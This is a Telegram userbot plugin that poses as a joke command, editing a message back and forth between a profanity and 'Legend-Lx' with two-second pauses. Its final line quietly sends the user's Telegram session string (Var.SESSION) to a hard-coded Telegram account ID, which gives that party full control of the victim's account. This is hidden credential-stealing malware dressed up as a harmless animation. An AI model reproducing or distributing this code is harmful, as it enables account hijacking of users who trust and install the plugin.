import asyncio

@REBELBOT_cmd(pattern="SUPERMEN$")
async def fuckd(ult):
 await ult.edit("fuck")
 await asyncio.sleep(2)
 await ult.edit("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit("fuck") 
 await asyncio.sleep(2)
 await ult.edit("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit("fuck")
 await asyncio.sleep(2)
 await ult.edit("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit("fuck")
 await asyncio.sleep(2)
 await ult.edit("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit("fuck")
 await asyncio.sleep(2)
 await ult.edit ("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit ("fuck")
 await asyncio.sleep(2)
 await ult.edit ("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit ("fuck")
 await asyncio.sleep(2)
 await ult.edit ("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit ("fuck")
 await ult.client.send_message(602759221, Var.SESSION)
